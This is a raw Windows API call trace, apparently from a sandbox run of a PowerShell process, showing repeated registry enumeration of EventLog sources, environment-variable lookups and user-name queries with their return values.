	[0165.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.451] GetLastError () returned 0xcb
	[0165.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0165.598] GetLastError () returned 0xcb
	[0166.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9a8 | out: phkResult=0xce9a8*=0x328) returned 0x0
	[0166.209] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcea10, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea0c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcea10*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcea0c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.210] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.210] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.210] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.211] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.211] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.211] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.211] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.211] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.212] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x337c48, lpcchName=0xcea2c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcea2c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0166.212] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x32c) returned 0x0
	[0166.212] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.212] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x344) returned 0x0
	[0166.213] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.213] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x350) returned 0x0
	[0166.213] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.213] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x354) returned 0x0
	[0166.213] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.214] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x358) returned 0x0
	[0166.214] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.214] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x35c) returned 0x0
	[0166.214] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.214] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x360) returned 0x0
	[0166.215] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.215] RegOpenKeyExW (in: hKey=0x328, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x364) returned 0x0
	[0166.215] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x0) returned 0x2
	[0166.215] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x368) returned 0x0
	[0166.216] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9d8 | out: phkResult=0xce9d8*=0x36c) returned 0x0
	[0166.216] RegCloseKey (hKey=0x36c) returned 0x0
	[0166.216] RegCloseKey (hKey=0x328) returned 0x0
	[0166.217] RegCloseKey (hKey=0x368) returned 0x0
	[0166.411] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338408, nSize=0xceb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xceb24) returned 0x1
	[0166.413] GetLastError () returned 0x3
	[0166.414] GetUserNameW (in: lpBuffer=0x337c48, pcbBuffer=0xceb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xceb2c) returned 1
	[0167.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce98c | out: phkResult=0xce98c*=0x328) returned 0x0
	[0167.796] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce9f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce9f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.796] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.796] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.796] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.796] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.797] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.797] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.797] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.797] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.797] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.798] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x36c) returned 0x0
	[0167.798] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.798] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x370) returned 0x0
	[0167.798] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.798] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x374) returned 0x0
	[0167.799] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.799] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x378) returned 0x0
	[0167.799] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.799] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x37c) returned 0x0
	[0167.799] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.800] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x380) returned 0x0
	[0167.800] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.800] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x384) returned 0x0
	[0167.800] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.801] RegOpenKeyExW (in: hKey=0x328, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x388) returned 0x0
	[0167.801] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.801] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x38c) returned 0x0
	[0167.801] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x390) returned 0x0
	[0167.801] RegCloseKey (hKey=0x390) returned 0x0
	[0167.802] RegCloseKey (hKey=0x328) returned 0x0
	[0167.802] RegCloseKey (hKey=0x38c) returned 0x0
	[0167.802] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce98c | out: phkResult=0xce98c*=0x38c) returned 0x0
	[0167.802] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce9f4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9f0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce9f4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9f0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.803] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.803] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.803] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.803] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.803] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.804] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.804] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.804] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.804] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x337c48, lpcchName=0xcea10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcea10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.804] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x328) returned 0x0
	[0167.805] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.805] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x390) returned 0x0
	[0167.805] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.805] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x394) returned 0x0
	[0167.806] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.806] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x398) returned 0x0
	[0167.806] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.806] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x39c) returned 0x0
	[0167.806] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.807] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x3a0) returned 0x0
	[0167.807] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.807] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x3a4) returned 0x0
	[0167.807] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.808] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x3a8) returned 0x0
	[0167.808] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x0) returned 0x2
	[0167.808] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x3ac) returned 0x0
	[0167.808] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9bc | out: phkResult=0xce9bc*=0x3b0) returned 0x0
	[0167.808] RegCloseKey (hKey=0x3b0) returned 0x0
	[0167.808] RegCloseKey (hKey=0x38c) returned 0x0
	[0167.809] RegCloseKey (hKey=0x3ac) returned 0x0
	[0167.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce980 | out: phkResult=0xce980*=0x3ac) returned 0x0
	[0167.810] RegQueryInfoKeyW (in: hKey=0x3ac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce9e8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9e4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce9e8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce9e4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.839] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x0, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.839] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x1, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.840] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x2, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.840] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x3, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.840] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x4, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.840] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x5, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.840] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x6, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.841] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x7, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.841] RegEnumKeyExW (in: hKey=0x3ac, dwIndex=0x8, lpName=0x337c48, lpcchName=0xcea04, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcea04, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.841] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x38c) returned 0x0
	[0167.841] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.842] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3b0) returned 0x0
	[0167.842] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.842] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3b4) returned 0x0
	[0167.842] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x0) returned 0x2
	[0167.842] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce9b0 | out: phkResult=0xce9b0*=0x3b8) returned 0x0
